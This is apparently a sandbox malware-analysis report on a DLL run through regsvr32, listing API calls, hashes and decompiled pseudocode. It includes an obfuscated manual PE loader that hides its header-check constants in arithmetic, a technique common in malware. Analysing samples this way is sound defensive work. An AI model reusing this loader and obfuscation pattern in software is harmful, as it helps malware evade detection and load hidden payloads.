0x1006534a

APIs

EnterCriticalSection.KERNEL32(10094E64,10094918,?,?,10094E48,10094E48,10065615,?,?,10064B9A,10062AFA,10064BB6,10041F16,?,10041F81,00000001), ref: 10065248
GlobalAlloc.KERNEL32(00002002,00000000,00000100,?,?,10094E48,10094E48,10065615,?,?,10064B9A,10062AFA,10064BB6,10041F16,?,10041F81), ref: 1006529D
GlobalHandle.KERNEL32(00260C58), ref: 100652A6
GlobalUnlock.KERNEL32(00000000,?,?,10094E48,10094E48,10065615,?,?,10064B9A,10062AFA,10064BB6,10041F16,?,10041F81,00000001), ref: 100652AF
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100652C1
GlobalHandle.KERNEL32(00260C58), ref: 100652D8
GlobalLock.KERNEL32 ref: 100652DF
LeaveCriticalSection.KERNEL32(1000EE0F,?,?,10094E48,10094E48,10065615,?,?,10064B9A,10062AFA,10064BB6,10041F16,?,10041F81,00000001), ref: 100652E5
GlobalLock.KERNEL32 ref: 100652F4
LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 1006533D

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 4ca3f13890834f85d7c55d4abc4d81846110131ba1ba42d92879a1837e051c86
Instruction ID: 49fd7f5e98f0a59121b5c277804ba4a413a326955dec32059cef37b24806589a
Opcode Fuzzy Hash: 4ca3f13890834f85d7c55d4abc4d81846110131ba1ba42d92879a1837e051c86
Instruction Fuzzy Hash: 393161756007179FE724CF28CC99A6AB7E9FB85201F01492EE866C3651E772F9448B10

Uniqueness

Uniqueness Score: -1.00%

Function 1001FAE3 Relevance: 7.5, APIs: 5, Instructions: 38
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1001FAE3() {
				int _t4;
				void* _t5;
				void* _t9;
				void** _t14;
				void* _t17;
				void* _t18;

				_t9 = 0;
				_t17 =  *0x100967a0 - _t9; // 0x1
				if(_t17 > 0) {
					_t5 =  *0x100967a4; // 0xda07d0
					_t1 = _t5 + 0xc; // 0xda07dc
					_t14 = _t1;
					do {
						VirtualFree( *_t14, 0x100000, 0x4000); // executed
						VirtualFree( *_t14, 0, 0x8000); // executed
						HeapFree( *0x100967a8, 0, _t14[1]);
						_t14 =  &(_t14[5]);
						_t9 = _t9 + 1;
						_t18 = _t9 -  *0x100967a0; // 0x1
					} while (_t18 < 0);
				}
				HeapFree( *0x100967a8, 0,  *0x100967a4);
				_t4 = HeapDestroy( *0x100967a8); // executed
				return _t4;
			}

0x1001fae4
0x1001fae6
0x1001faf3
0x1001faf5
0x1001fb02
0x1001fb02
0x1001fb05
0x1001fb11
0x1001fb1c
0x1001fb29
0x1001fb2b
0x1001fb2e
0x1001fb2f
0x1001fb2f
0x1001fb38
0x1001fb47
0x1001fb4f
0x1001fb57

APIs

VirtualFree.KERNELBASE(00DA07DC,00100000,00004000,?,?,?,?,1001A8FC,1001A950,?,?,?), ref: 1001FB11
VirtualFree.KERNELBASE(00DA07DC,00000000,00008000,?,?,1001A8FC,1001A950,?,?,?), ref: 1001FB1C
HeapFree.KERNEL32(00000000,?), ref: 1001FB29
HeapFree.KERNEL32(00000000,?,?), ref: 1001FB47
HeapDestroy.KERNELBASE(?,?,1001A8FC,1001A950,?,?,?), ref: 1001FB4F

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Free$Heap$Virtual$Destroy
String ID:
API String ID: 782257640-0
Opcode ID: a9ac4f2974066dba302b56dbc9e81f24b783b1b1c87a90d56e69b718836080dc
Instruction ID: 6624a6bf9327147724d5856c3a8911dc64869e0a672d67e0a85e7c9f58c955e6
Opcode Fuzzy Hash: a9ac4f2974066dba302b56dbc9e81f24b783b1b1c87a90d56e69b718836080dc
Instruction Fuzzy Hash: 35F04936244225EFEA259FD1CCC5F0ABB62FB88798F611026F2482A0B0C7726851DB18

Uniqueness

Uniqueness Score: -1.00%

Function 10001212 Relevance: 7.2, APIs: 4, Instructions: 1193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E10001212(void* __eflags) {
				signed int _t346;
				void* _t348;
				signed int _t349;
				void* _t354;
				signed int _t355;
				signed int _t358;
				signed int _t361;
				void* _t363;
				signed int _t366;
				signed int _t368;
				signed int _t375;
				signed int _t376;
				signed int _t381;
				signed int _t385;
				signed int _t387;
				void* _t389;
				signed int _t392;
				void* _t393;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t406;
				signed int _t407;
				signed int _t413;
				void* _t415;
				signed int _t416;
				signed int _t425;
				signed int _t426;
				void* _t427;
				signed int _t428;
				void* _t435;
				void* _t436;
				signed int _t440;
				signed int _t442;
				void* _t450;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t463;
				signed int _t464;
				intOrPtr _t468;
				signed int _t487;
				signed int _t491;
				signed int _t497;
				signed int _t510;
				signed int _t513;
				signed int _t526;
				signed int _t531;
				signed int _t542;
				signed int _t553;
				intOrPtr _t572;
				signed int _t579;
				void* _t588;
				intOrPtr _t589;
				signed int _t600;
				void* _t612;
				signed int _t621;
				signed int _t622;
				signed int _t637;
				void* _t643;
				signed int _t656;
				signed int _t658;
				signed int _t659;
				signed int _t663;
				signed int _t664;
				signed int _t666;
				signed int _t667;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t676;
				signed int _t684;
				signed int _t688;
				signed int _t689;
				signed int _t691;
				signed int _t694;
				signed int _t695;
				signed int _t699;
				signed int _t702;
				signed int _t703;
				signed int _t709;
				signed int _t714;
				signed int _t715;
				signed int _t718;
				signed int _t726;
				signed int _t727;
				intOrPtr _t730;
				signed int _t736;
				signed int _t742;
				signed int _t743;
				signed int _t745;
				signed int _t747;
				signed int _t754;
				signed int _t758;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t775;
				signed int _t786;
				signed int _t792;
				signed int _t800;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t813;
				signed int _t826;
				signed int _t828;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t839;
				signed int _t840;
				signed int _t843;
				signed int _t846;
				signed int _t847;
				signed int _t852;
				signed int _t858;
				signed int _t861;
				signed int _t864;
				signed int _t865;
				signed int _t885;
				intOrPtr* _t901;
				signed int _t906;
				signed int _t913;
				signed int _t914;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t936;
				signed int _t943;
				intOrPtr _t945;
				signed int _t947;
				signed int _t948;
				signed int _t976;
				signed int _t1000;
				signed int _t1006;
				signed int _t1007;
				signed int _t1011;
				signed int _t1017;
				signed int _t1025;
				signed int _t1035;
				signed int _t1043;
				signed int _t1044;
				signed int _t1048;
				signed int _t1070;
				signed int _t1073;
				signed int _t1076;
				signed int _t1080;
				signed int _t1082;
				signed int _t1083;
				signed int _t1084;
				signed int _t1086;
				intOrPtr* _t1088;
				signed int _t1089;
				void* _t1123;
				signed int _t1132;
				signed int _t1135;
				signed int _t1140;
				void* _t1163;
				signed int _t1181;
				signed int _t1182;
				signed int _t1201;
				intOrPtr _t1217;
				signed int _t1220;
				signed int _t1251;
				signed int _t1253;
				signed int _t1256;
				signed int _t1259;
				signed int _t1260;
				void* _t1264;
				signed int _t1289;
				void* _t1297;
				void* _t1298;
				void* _t1299;
				void* _t1300;
				void* _t1301;

				_t656 =  *0x1008f224; // 0x0
				_t1000 =  *0x1008f220; // 0x0
				_t743 =  *0x1008f214; // 0x0
				_t865 =  *0x1008f218; // 0x0
				_t745 =  *0x1008f228; // 0x0
				 *((intOrPtr*)(_t1297 + 0x18)) = 0;
				_t6 = _t656 + 2; // 0x2
				_t747 =  *0x1008f21c; // 0x0
				_t7 = _t865 + 0x3fffffff; // 0x3fffffff
				_t9 = _t1000 + 2; // 0x2
				_t346 =  *0x1008f214; // 0x0
				_t348 = E10006460( *((intOrPtr*)(_t1297 + 0x64)) + ((_t747 + 0xbffffffd) * _t656 + ((_t747 + _t9) *  *0x1008f228 + _t747 << 0x1e) - (_t747 + _t9) *  *0x1008f228 + _t747 + _t346 + (_t7 * _t747 + (_t6 << 0x1e) - _t6) * _t865) * 4, (_t1000 * _t656 - 1) * _t865 + _t743 * _t1000 + ((_t1000 * _t656 - 1) * _t865 + _t743 * _t1000) * 2 - (_t745 * _t656 + 3) * _t745 + _t656 + ((_t745 * _t656 + 3) * _t745 + _t656) * 2 + 0x40);
				_t1298 = _t1297 + 8;
				if(_t348 != 0) {
					_t349 =  *0x1008f224; // 0x0
					_t658 =  *0x1008f228; // 0x0
					_t1006 =  *0x1008f214; // 0x0
					_t754 =  *0x1008f218; // 0x0
					if(0 == _t1006 + (3 - _t349) * _t658 + _t754 * 2 + _t349 + _t1006 + (3 - _t349) * _t658 + _t754 * 2 + _t349 + 0x5a4d) {
						_t18 = _t754 + 3; // 0x3
						_t1007 =  *0x1008f220; // 0x0
						_t659 =  *0x1008f21c; // 0x0
						_t24 = _t754 + 1; // 0x1
						_t354 = E10006460( *((intOrPtr*)(_t1298 + 0x64)) + (2 - (_t659 *  *0x1008f228 << 1)) * _t1007 + (((_t1007 * _t349 + 1) *  *0x1008f214 + 0x7fffffff) * _t349 + _t24 * _t754) * 2,  *((intOrPtr*)( *((intOrPtr*)(_t1298 + 0x5c)) + 0x3c)) + ((2 - _t349 + _t349) * _t754 + 2) * _t349 - (_t1006 * _t1007 + _t659 + _t18 * _t658 << 1) + 0xf8);
						_t1299 = _t1298 + 8;
						if(_t354 != 0) {
							_t663 =  *0x1008f214; // 0x0
							_t487 =  *0x1008f220; // 0x0
							_t355 =  *0x1008f228; // 0x0
							_t758 =  *0x1008f218; // 0x0
							_t664 =  *0x1008f21c; // 0x0
							_t885 = _t758 * _t355;
							_t1011 =  *0x1008f224; // 0x0
							 *(_t1299 + 0x30) = _t885;
							_t491 =  *0x1008f220; // 0x0
							 *((intOrPtr*)(_t1299 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t1299 + 0x5c)) + 0x3c)) + ((_t355 - _t663 * _t663 * _t487 + 1) * _t664 - (_t487 + _t1011 << 1) - _t885) * 2 +  *((intOrPtr*)(_t1299 + 0x5c));
							_t35 = _t491 + 1; // 0x1
							_t37 = _t758 + 1; // 0x1
							_t897 = _t355 * 0x2aaaaaaa + _t1011;
							_t900 = _t664 * _t491;
							_t901 =  *((intOrPtr*)(_t1299 + 0x10));
							_t42 = (( ~_t355 << 0x1f) - _t355 + _t35) *  *0x1008f214 + (_t664 + _t37) * _t758 + _t355 * 0x2aaaaaaa + _t1011 + _t897 * 2 + ( ~(_t664 * _t491) << 0x1f) - _t900 + 0x4550; // 0x4551
							if( *_t901 == (( ~_t355 << 0x1f) - _t355 + _t35) *  *0x1008f214 + (_t664 + _t37) * _t758 + _t355 * 0x2aaaaaaa + _t1011 + _t897 * 2 + ( ~(_t664 * _t491) << 0x1f) - _t900 + _t42) {
								_t497 =  *0x1008f214; // 0x0
								_t44 = (2 - _t497 + _t497) * _t1011 + 0x14c; // 0x14c
								if(0 == _t355 + _t44) {
									 *(_t1299 + 0x1c) =  *(_t901 + 0x38);
									_t906 =  *0x1008f214; // 0x0
									if(( *(_t1299 + 0x1c) & (_t906 * _t758 * _t355 + _t664 + ( ~(_t355 * _t1011 + _t758 + 1) << 0x0000001f) - _t355 * _t1011 + _t758 + 0x00000001) * _t1011 + (_t664 * _t758 + 0x00000001) * _t664 + (_t906 * _t758 * _t355 + _t664 + ( ~(_t355 * _t1011 + _t758 + 1) << 0x0000001f) - _t355 * _t1011 + _t758 + 0x00000001) * _t1011 + (_t664 * _t758 + 0x00000001) * _t664 + 0x00000001) == 0) {
										_t913 =  *0x1008f214; // 0x0
										_t914 = _t913 *  *0x1008f220;
										_t510 = _t664 * _t1011;
										 *(_t1299 + 0x24) = _t914;
										_t1123 = _t355 - _t914;
										 *(_t1299 + 0x20) = _t510;
										_t58 = _t1123 - 3; // -3
										_t60 = _t355 + 1; // 0x1
										_t513 =  *0x1008f220; // 0x0
										_t61 = _t513 + 2; // 0x2
										 *((intOrPtr*)(_t1299 + 0x14)) =  *((intOrPtr*)(_t1299 + 0x10)) + 0x18 + ((_t510 + _t58) * _t355 - (_t758 + _t60) * _t1011 + _t61 * _t758 - _t513 + ((_t510 + _t58) * _t355 - (_t758 + _t60) * _t1011 + _t61 * _t758 - _t513) * 4) * 8;
										_t75 = _t355 + 1; // 0x1
										_t932 = 0 +  ~(((_t664 + _t75) * _t758 + _t355) * 4 - (_t664 + _t75) * _t758 + _t355) - (_t1011 * _t1011 * _t1011 *  *(_t1299 + 0x20) + 3 + _t1011 * _t1011 * _t1011 *  *(_t1299 + 0x20) * 2) *  *0x1008f220;
										 *(_t1299 + 0x20) = _t932;
										if(_t932 <= 0) {
											_t1132 =  *0x1008f214; // 0x0
										} else {
											_t637 =  *0x1008f220; // 0x0
											 *(_t1299 + 0x2c) = ((1 - _t664) * _t758 * _t355 + (1 - _t637) * _t1011) * _t664 + (_t355 - _t637) * _t1011 - _t758;
											 *((intOrPtr*)(_t1299 + 0x14)) =  *((intOrPtr*)(_t1299 + 0x14)) + 0xc;
											do {
												if( *((intOrPtr*)( *((intOrPtr*)(_t1299 + 0x14)) + 4)) != 0) {
													_t98 = _t758 + 2; // 0x2
													_t643 =  *((intOrPtr*)( *((intOrPtr*)(_t1299 + 0x14)) + 4)) + (_t355 * _t355 + ( ~(_t98 * _t758) << 0x1f) - _t98 * _t758 + _t664 + ( *(_t1299 + 0x24) + 1) * _t1011) * 2 +  *((intOrPtr*)( *((intOrPtr*)(_t1299 + 0x14))));
												} else {
													_t1289 =  *0x1008f220; // 0x0
													_t643 =  *((intOrPtr*)( *((intOrPtr*)(_t1299 + 0x14)))) + ((_t355 + _t1132) * _t664 + _t1132 + ((( ~_t758 << 0x1f) - _t758 + 1) * _t1011 + _t664 * _t1132 * _t355 - 2) * _t758 + ((_t1289 << 0x1e) -  *0x1008f220) * 2 + _t1011) * 2 +  *(_t1299 + 0x1c);
												}
												if(_t643 <=  *(_t1299 + 0x2c) +  *((intOrPtr*)(_t1299 + 0x18))) {
													_t1132 =  *0x1008f214; // 0x0
												} else {
													_t105 = _t1011 - 2; // -2
													_t1132 =  *0x1008f214; // 0x0
													 *((intOrPtr*)(_t1299 + 0x18)) = _t105 * _t1011 - _t758 * _t758 + _t664 * _t664 -  *(_t1299 + 0x30) - _t355 - _t355 - _t355 + _t664 + _t1132 +  *0x1008f220 + _t643;
												}
												_t976 =  *(_t1299 + 0x20) - 1;
												 *((intOrPtr*)(_t1299 + 0x14)) =  *((intOrPtr*)(_t1299 + 0x14)) + 0x28;
												 *(_t1299 + 0x20) = _t976;
											} while (_t976 != 0);
										}
										 *0x10092e10(_t1299 + 0x34 + (_t664 - (_t1132 + 1) * _t355 + (_t664 - (_t1132 + 1) * _t355) * 8) * 4);
										_t666 =  *0x1008f21c; // 0x0
										_t358 =  *0x1008f228; // 0x0
										_t933 =  *0x1008f214; // 0x0
										_t1135 =  *0x1008f220; // 0x0
										_t117 = _t666 + 1; // 0x1
										_t667 =  *0x1008f218; // 0x0
										_t119 = _t933 + 2; // 0x2
										_t122 = _t933 + 2; // 0x2
										_t767 =  *0x1008f224; // 0x0
										 *(_t1299 + 0x30) =  *((intOrPtr*)(_t1299 + 0x38)) + ((( ~(_t666 + _t358) << 0x1f) - _t666 + _t358 + _t122) * _t767 + _t1135 + ( ~(_t119 * _t358 + _t117 * _t667) << 0x1f) - _t119 * _t358 + _t117 * _t667) * 2;
										_t1017 =  *0x1008f21c; // 0x0
										_t126 = _t1017 + 1; // 0x1
										_t526 = _t126 * _t1017;
										_t127 = _t667 + 1; // 0x1
										 *(_t1299 + 0x24) = _t526;
										_t1025 = _t933 * _t933 * _t667;
										 *(_t1299 + 0x2c) = _t1025;
										_t1140 =  *0x1008f21c; // 0x0
										 *(_t1299 + 0x20) = _t1140 * _t667;
										_t531 = _t526 + (_t358 << 0x1e) - _t358 + ((_t127 *  *0x1008f220 << 0x1d) - _t127 *  *0x1008f220) * 2 + _t933 + _t767 << 2;
										 *(_t1299 + 0x28) = _t531;
										_t1035 =  *0x1008f220; // 0x0
										_t934 =  *0x1008f21c; // 0x0
										_t936 =  *0x1008f21c; // 0x0
										_t1043 = ( *(_t1299 + 0x30) +  *((intOrPtr*)( *((intOrPtr*)(_t1299 + 0x10)) + 0x50)) + (( ~(_t1025 *  *0x1008f220 * _t358 * _t358) << 0x0000001f) - _t1025 *  *0x1008f220 * _t358 * _t358 + _t667) * 0x00000002 - 0x00000001 &  !( *(_t1299 + 0x30) - 1) + _t531) + (( *(_t1299 + 0x20) + 3) * _t933 + _t934 + ( ~(_t1035 + _t358) << 0x1f) - _t1035 + _t358) * 2 + (2 - _t936 + _t358 + _t936 + _t358) * _t767 + (2 - _t667 + _t667) * _t667;
										 *(_t1299 + 0x1c) = _t1043;
										_t542 =  *((intOrPtr*)(_t1299 + 0x38)) - _t667 - _t358;
										_t943 =  *0x1008f220; // 0x0
										 *(_t1299 + 0x30) = _t542;
										if(_t1043 == ( *((intOrPtr*)(_t1299 + 0x18)) + (_t943 * _t767 - 0x00000001) * _t358 +  *(_t1299 + 0x2c) + _t542 - 0x00000001 &  !( *(_t1299 + 0x30) - 1) +  *(_t1299 + 0x28))) {
											_t1044 =  *0x1008f214; // 0x0
											_t1163 = ( ~(_t767 * _t767) << 0x1f) - _t767 * _t767;
											_t1048 =  *0x1008f214; // 0x0
											_t156 = _t1163 + 0x7fffffff; // 0x7fffffff
											_t553 =  *0x1008f214; // 0x0
											_t160 = _t553 + 1; // 0x1
											_t1062 = _t667 * _t358 * _t767 + 1;
											_t1065 = _t667 * 0x2aaaaaaa + _t553;
											_t1068 =  *(_t1299 + 0x2c) + _t358;
											_t169 = (( ~(_t667 * _t358 * _t767 + 1) << 0x1f) - _t1062 + _t943) * _t767 + _t667 * 0x2aaaaaaa + _t553 + _t1065 * 2 + ( ~( *(_t1299 + 0x2c) + _t358) << 0x1f) - _t1068 + 0x2000; // 0x2001
											_t1070 =  *0x1008f214; // 0x0
											_t1073 =  *0x1008f21c; // 0x0
											_t1181 =  *0x1008f214; // 0x0
											_t1076 =  *(_t1299 + 0x24);
											_t1182 =  *0x1008f21c; // 0x0
											_t945 =  *((intOrPtr*)(_t1299 + 0x78))(((_t358 * _t358 * _t767 - _t1181) * _t358 + _t1182 + _t767 - 1) * _t667 - _t358 + _t943 + _t767 +  *((intOrPtr*)( *(_t1299 + 0x20) + 0x34)), _t1076, (( ~(_t667 * _t358 * _t767 + 1) << 0x0000001f) - _t1062 + _t943) * _t767 + _t667 * 0x2aaaaaaa + _t553 + _t1065 * 0x00000002 + ( ~( *(_t1299 + 0x2c) + _t358) << 0x0000001f) - _t1068 + _t169 | 0x00001000 + ((_t1070 * _t767 * _t767 << 0x0000001e) - _t1070 * _t767 * _t767 + _t1073 * _t943) * 0x00000004, (_t1048 + (_t1044 + 1) *  *0x1008f21c + _t156) * _t767 + ( *(_t1299 + 0x24) + _t358 + 0x7fffffff) *  *0x1008f21c + ( ~(_t943 * _t943) << 0x1f) - _t943 * _t943 + _t160 * 2 + _t667 + _t667 * 2 << 1,  *((intOrPtr*)(_t1299 + 0x78)));
											_t1300 = _t1299 + 0x14;
											if(_t945 != 0) {
												_t572 =  *((intOrPtr*)(_t1300 + 0x78));
												goto L30;
											} else {
												_t463 =  *0x1008f218; // 0x0
												_t572 =  *((intOrPtr*)(_t1300 + 0x78));
												_t742 = _t463 * _t463;
												_t861 =  *0x1008f214; // 0x0
												_t947 =  *0x1008f21c; // 0x0
												_t1264 = (_t861 + _t463 << 0x1e) - _t861 + _t463 + _t947;
												_t948 =  *0x1008f228; // 0x0
												_t185 = _t1264 + 2; // 0x2
												_t187 = _t463 * 2; // -3
												_t864 =  *0x1008f224; // 0x0
												_t464 =  *0x1008f21c; // 0x0
												_t468 =  *((intOrPtr*)(_t1300 + 0x78))(0, _t1076 - _t464 * _t464 + _t742 + (_t464 * _t464 + _t742) * 2, 0x00001000 + (_t861 * _t861 + _t742 + (_t948 + _t185) * _t948 + _t864) * 0x00000004 | ((_t463 + _t187 - 0x00000003) * _t864 + 0x00000003) * _t463 + 0x00002000, _t463 + _t463 * 2 + _t463 + _t463 * 2 + 4, _t572);
												_t945 = _t468;
												_t1300 = _t1300 + 0x14;
												if(_t945 != 0) {
													L30:
													_t768 =  *0x1008f214; // 0x0
													_t361 =  *0x1008f224; // 0x0
													_t668 =  *0x1008f228; // 0x0
													_t669 = _t668 * _t361;
													_t196 = _t361 + 2; // 0x2
													_t1080 =  *0x1008f220; // 0x0
													_t1082 =  *0x1008f218; // 0x0
													_t1083 =  *0x1008f220; // 0x0
													_t1084 =  *0x1008f228; // 0x0
													_t198 = (_t768 *  *0x1008f220 *  *0x1008f228 + _t196) *  *0x1008f21c + _t1080 * _t361 - _t669 - _t1082 - _t1082 - _t1083 - _t1084 - _t1084 + _t768 + 0x40; // 0x40
													_t1086 =  *0x1008f21c; // 0x0
													_t670 =  *0x1008f220; // 0x0
													_t769 =  *0x1008f228; // 0x0
													_t1201 =  *0x1008f228; // 0x0
													_t200 = _t361 + 8; // 0xa
													_t363 = HeapAlloc(GetProcessHeap(), (2 - _t361) *  *0x1008f218 + (_t769 - _t670) * _t1086 + _t670 + ((_t1086 * _t1086 * _t768 * _t361 + _t669) * _t768 + _t361) * _t768 + _t1201 + _t200, _t361 + _t198);
													_t676 =  *0x1008f224; // 0x0
													_t1088 = _t363 - (_t676 << 7);
													if(_t1088 != 0) {
														 *((intOrPtr*)(_t1088 + 4)) = _t945;
														_t775 =  *0x1008f220; // 0x0
														_t366 =  *0x1008f21c; // 0x0
														_t368 =  *0x1008f224; // 0x0
														asm("sbb ecx, ecx");
														 *((intOrPtr*)(_t1088 + 0x1c)) =  *((intOrPtr*)(_t1300 + 0x64));
														 *((intOrPtr*)(_t1088 + 0x24)) =  *((intOrPtr*)(_t1300 + 0x6c));
														 *(_t1088 + 0x14) =  ~( ~(0x00002000 + (_t366 + _t775) * 0x00000008 - (_t368 + _t368 * 0x00000002 << 0x00000002) & 0));
														 *((intOrPtr*)(_t1088 + 0x20)) =  *((intOrPtr*)(_t1300 + 0x68));
														 *((intOrPtr*)(_t1088 + 0x28)) =  *((intOrPtr*)(_t1300 + 0x70));
														 *((intOrPtr*)(_t1088 + 0x2c)) =  *((intOrPtr*)(_t1300 + 0x74));
														 *((intOrPtr*)(_t1088 + 0x34)) = _t572;
														_t684 =  *0x1008f224; // 0x0
														_t221 = _t684 + 2; // 0x2
														_t375 =  *0x1008f21c; // 0x0
														_t376 =  *0x1008f228; // 0x0
														_t688 =  *0x1008f218; // 0x0
														_t689 =  *0x1008f220; // 0x0
														_t786 =  *0x1008f214; // 0x0
														 *((intOrPtr*)(_t1088 + 0x3c)) =  *((intOrPtr*)(_t1300 + 0x38)) + (_t376 + ((_t376 << 0x1d) - _t376) * 4 + ( ~(_t221 * _t684) << 0x1f) - _t221 * _t684 + _t375 + _t688 * 2 + _t786 + _t689) * 2;
														_t691 =  *0x1008f228; // 0x0
														_t381 =  *0x1008f21c; // 0x0
														_t385 =  *0x1008f218; // 0x0
														_t792 =  *0x1008f224; // 0x0
														_t387 =  *0x1008f220; // 0x0
														_t389 = E10006460( *((intOrPtr*)(_t1300 + 0x64)) + (_t691 + ( ~_t387 << 0x1f) - _t387 + ((_t385 + _t792 << 0x1e) - _t385 + _t792) * 2) * 2, _t385 + _t385 * 2 - _t381 *  *0x1008f214 + _t691 *  *0x1008f224 + (_t381 *  *0x1008f214 + _t691 *  *0x1008f224) * 2 +  *((intOrPtr*)( *((intOrPtr*)(_t1300 + 0x10)) + 0x54)));
														_t1301 = _t1300 + 8;
														if(_t389 == 0) {
															L40:
															_push(_t1088);
															E100011EF();
															return 0;
														} else {
															_t392 =  *0x1008f214; // 0x0
															_t694 =  *0x1008f228; // 0x0
															_t800 =  *0x1008f21c; // 0x0
															_t807 =  *0x1008f224; // 0x0
															_t579 =  *0x1008f220; // 0x0
															_t808 =  *0x1008f218; // 0x0
															_t253 = _t808 - 1; // -1
															_t1217 =  *((intOrPtr*)(_t1301 + 0x1c));
															_t393 =  *((intOrPtr*)(_t1301 + 0x78))(_t945, ((_t579 - 1) * _t807 + _t392 - 1) *  *0x1008f21c + (_t253 * _t392 - 2) * _t808 - _t694 +  *((intOrPtr*)(_t1217 + 0x54)) + _t392, _t807 + _t807 * 2 + (_t392 *  *0x1008f224 + _t392 *  *0x1008f224 * 2 - _t800 * _t694 + _t800 * _t694 * 2) *  *0x1008f21c + (3 - _t694 + _t694 * 2) * _t392 + 0x1000, 4 - _t392 - _t694, _t572);
															_t695 =  *0x1008f224; // 0x0
															_t809 =  *0x1008f21c; // 0x0
															_t588 = _t393;
															_t257 = _t695 - 1; // -1
															_t813 =  *0x1008f214; // 0x0
															_t259 = _t695 + 4; // 0x4
															memcpy(_t588,  *(_t1301 + 0x70), (_t257 *  *0x1008f220 + 2) *  *0x1008f218 + (_t809 *  *0x1008f214 + 2) * _t695 + (_t813 + _t259) *  *0x1008f228 + ((_t257 *  *0x1008f220 + 2) *  *0x1008f218 + (_t809 *  *0x1008f214 + 2) * _t695 + (_t813 + _t259) *  *0x1008f228) * 2 +  *((intOrPtr*)(_t1217 + 0x54)));
